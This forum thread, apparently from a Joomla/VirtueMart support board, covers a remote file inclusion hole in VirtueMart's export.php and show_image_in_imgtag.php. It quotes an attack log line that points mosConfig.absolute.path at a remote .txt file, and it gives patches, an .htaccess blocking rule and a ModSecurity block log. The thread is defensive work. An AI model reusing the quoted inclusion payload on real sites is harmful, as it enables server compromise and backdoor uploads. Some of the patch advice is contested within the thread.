Author Topic: Hacked by url injection file EXPORT.PHP  (Read 30628 times)

rezopac

  • Beginner
  • *
  • Posts: 14
Hacked by url injection file EXPORT.PHP
« on: January 05, 2010, 11:35:39 am »
Hello. if you're server's owner give you this type of log, this subject is for you :

194.146.227.28 - - [xx/Jan/20xx:08:31:18 +0100] "GET
//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onesiteoranother.fr/media/Shaun$.txt?
HTTP/1.1" 200 167 "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"

Know that it is a way to upload files in you're cache folder. this is available only for virtuemart versions < 1.1.3 In fact it has been repared in latest versions, but after been hacked I havn't found anything on the web about this.

The way to secure it is very simple, you just have to replace lines in file /administrator/components/com_virtuemart/export.php (near line 10):

else
   die( "Joomla Configuration File not found!" );


require_once( $mosConfig_absolute_path . '/includes/joomla.php' );

BY

else {
   die( "Joomla Configuration File not found!" );
}
if( isset($_REQUEST['mosConfig_absolute_path'])) die();

require_once( $mosConfig_absolute_path . '/includes/joomla.php' );

If you are completly obsess by security you also can add at line 0 thoses lines :

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

good bye, and now you can look for the uploaded backdoor (beware of c99sh.php).

thank you to let this post and don't hesitate to reply if you want more specific details.



Inazo

  • Beginner
  • *
  • Posts: 1
Re: Hacked by url injection file EXPORT.PHP
« Reply #1 on: January 07, 2010, 14:20:50 pm »
Hello all,

This RFI is not only in export.php we can exploit it in components/com_virtuemart/show_image_in_imgtag.php

For patch it other solutions :

   1. register_globals OFF
   2. Add rules in ".htaccess" : "RewriteCond %{QUERY_STRING} mosConfig.[a-zA-Z.]{1,21}(=|\%3D) [OR]"

Quote
good bye, and now you can look for the uploaded backdoor (beware of c99sh.php).

Backdoor can have lot of name becarefull !!! We have seen "http.txt", "imags.php", "offflines.php" and lot of others.

Best regards,

rezopac

  • Beginner
  • *
  • Posts: 14
Re: Hacked by url injection file show_image_in_imgtag.PHP
« Reply #2 on: January 07, 2010, 15:35:46 pm »
yes you're totaly right but I've never find the way to use it,

It is not a reason to ignore that so I thank you for you're contribution.


As in export.php it can be fix by adding on line 24 between :
include_once("../../administrator/components/com_virtuemart/virtuemart.cfg.php");

//   Image2Thumbnail - Klasse einbinden
include( CLASSPATH . "class.img2thumb.php");

this code :
if( isset($_REQUEST['mosConfig_absolute_path'])) die();

Now nobody can define another mosconfig_absolute_path variable whitout stopping script execution.

good securisation, and beware of base64 encoded files, it is probably a backdoor like mod_mosef.php

good afternoon

rezopac

  • Beginner
  • *
  • Posts: 14
Hacked by url injection file show_image_in_imgtag.php and export.php
« Reply #3 on: January 14, 2010, 10:08:59 am »
Hello :

Now I post this new subject cause There is a big problem.

you that when you discard access right to a hacker backdoor's, he is going to spend all his time trying to F..K you.

that's what happens...

ok so it appears that in the files show_image_in_imgtag.php and export.php, it is not efficent to put only the code :

if( isset($_REQUEST['mosConfig_absolute_path'])) die();


you must add just after this line

if( isset($_REQUEST['mosConfig.absolute.path'])) die();

And you have to add at the beginning of the file :

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );



IF THIS HAVEN'T BEEN ADDED YOU ARE ALWAYS VULNERABLE TO ATTACKS :

I'm not gonna say how the hacker have done his job cause it is not public right now.

I INSIST ON THE FACT THAT THOSE LINES MUST BE ADD FOR ALL VERSIONS OF VIRTUEMART AND IN THE TWO FILES EXPORT.PHP AND SHOW_IMAGE_IN_IMGTAG.PHP

those files are located :
administrator/components/com_virtuemart/export.php
components/com_virtuemart/show_image_in_imgtag.php (you are in public zone so your .htaccess cannot do nothing for you)

have a nice day

Ked

  • Beginner
  • *
  • Posts: 1
Re: Hacked by url injection file EXPORT.PHP
« Reply #4 on: August 04, 2010, 10:21:20 am »
Hi,

I just found this thread by searching on "com_virtuemart export.php" as one of the sites I host came under multiple simultaneous attacks early this morning.

I'd just like to say that a good extra line of defense is Apache mod_security combined with the modsec rules from GotRoot.  It's a free application level firewall which will block any remote file inclusion / PHP injection type attacks.  Here's an example of it blocking the attacks this morning:

[Wed Aug 04 04:39:45 2010] [error] [client 202.125.152.246] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec_rules/10_asl_rules.conf"] [line "203"] [id "340026"] [rev "49"] [msg "PHP Injection attempt in URI"] [data ""] [severity "CRITICAL"] [hostname "www.mysite.com"] [uri "/administrator/components/com_virtuemart/export.php"] [unique_id "TFjhAVXqhd4AABWTgC8AAAAF"]

Combined with IPTables (in my case CSF) the attacking IP is automatically banned permanantly.

I got 5 of these attacks simultaneously at around 04:25 this morning, all originating from different IPs. 

Is anyone noticing an upswing in these attacks atm?

Regards,

Ked



mwf

  • Jr. Member
  • **
  • Posts: 87
  • Ready to Code!
    • EXPS
Re: Hacked by url injection file EXPORT.PHP
« Reply #5 on: August 04, 2010, 12:16:38 pm »
Hi Ked,

I notice increased spammer/hacker action this weekend - one site hit with  200+ sequential bogus requests. Fortunately, there was no effect on the site. In addition to modifying show_image_in_imgtag.php as suggested here I removed export.php and fetchscript.php from VM altogether. I never use the Export Module so I remove it completely. Fetchscript was attracting spammers/hacker because "define(_JEXEC)..." can not be added to the file. The compression fetchscript provided has been replaced with minified code versions and the Joomla GZip option.

Another line of defense is Joomla template error.php which I use to trap and direct attackers. It also sends me a alert when bad bots turn up or page errors are thrown (500, 404, 403...).


My final line of defense is country blocking via .htaccess using lists posted here http://www.countryipblocks.net/

Prior to making these changes sites were being hit daily with spam/hack request. After making these changes very few "?mosconfig.." type attacks.

I'll checkout your suggestion - thanks!
Professional Joomla Development and Support
http://www.exps.ca

TimU

  • Beginner
  • *
  • Posts: 29
Re: Hacked by url injection file EXPORT.PHP
« Reply #6 on: August 10, 2010, 02:51:10 am »
Issue found with these instructions, VM version 1.1.5

When I included:
Code: [Select]
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

into the top of show_image_in_imgtag.php as suggested here, my site no longer showed thumbnail images in the category browse pages.

Just so I'm clear, can someone please confirm if the below config is correct?

In show_image_in_imgtag.php, ~line 28/29 it should now read:
Code: [Select]
if( isset($_REQUEST['mosConfig_absolute_path'])) die();
if( isset($_REQUEST['mosConfig.absolute.path'])) die();
www.Invitations2Impress.com
Personalised Invitations For Every Occasion

We custom design event invitations using your own photos to give an extra personal touch that your guests will love!
All our designs can be made to suit ANY occasion!

mwf

  • Jr. Member
  • **
  • Posts: 87
  • Ready to Code!
    • EXPS
Re: Hacked by url injection file EXPORT.PHP
« Reply #7 on: August 11, 2010, 12:09:20 pm »
TimU,

I'm using 1.1.5 and there is no problem with category thumbs displaying.
The changes I made to show_image_in_imgtag.php are a little different:

Add to top of file:
defined('_JEXEC') or die( 'Restricted access' );

Remove from file:
define('_VALID_MOS', 1);

// Get the Joomla! configuration file
$config_file = '../../configuration.php';
include_once( $config_file );

if( isset($_REQUEST['mosConfig_absolute_path'])) die();

if( !isset( $mosConfig_absolute_path ) ) {
// We are in J! 1.5
   define( '_JEXEC', 1 );
   $mosConfig_absolute_path = dirname( $config_file );
}

include_once("../../administrator/components/com_virtuemart/virtuemart
Professional Joomla Development and Support
http://www.exps.ca

magestyx

  • Beginner
  • *
  • Posts: 7
Re: Hacked by url injection file EXPORT.PHP
« Reply #8 on: May 12, 2011, 18:48:56 pm »
Regarding show_image_in_imgtag.php :

Like TimU, I can confirm that requiring _JEXEC be defined does not allow thumbnails to show (J1.5.11 & VM1.1.3).  And, it makes sense why.  The show_image_in_imgtag.php is somewhat of a standalone file that simply returns a resized image.  It doesn't have to be called from another Joomla file in order to work.  If you look at one of the image tags it creates in VM you can go to it directly and it'll show the image in a browser.  As soon as you require _JEXEC it's going to die since the Joomla framework is not needed or loaded for the script to run.  Unless you define it manually, which defeats the purpose, it'll return 'Restricted Access'.

Regarding the above code, it also seems redundant to have the script define _JEXEC if there's no mosConfig_absolute_path.  If there's a _REQUEST set for mosConfig_absolute_path then simply kill the script-- that's it-- so why all the extra code?  You also don't have to include the joomla config file if you're setting mosConfig_absolute_path to the same thing.

Clearing all that out, this works for me:

if( isset($_REQUEST['mosConfig_absolute_path'])) die(); //just kill it if this is found for any reason
define( '_JEXEC', 1 ); //since there's no Joomla framework being loaded, we need this so we can run the joomla configuration file
$mosConfig_absolute_path = dirname( '../../configuration.php' );
include_once("../../administrator/components/com_virtuemart/virtuemart.cfg.php");


Still, since I have disallowed mosConfig_* as a query request through the .htaccess file, I'm still not sure this is necessary at all.  Frankly it all seems double and triple redundant, but do correct me if I'm wrong.

Magestyx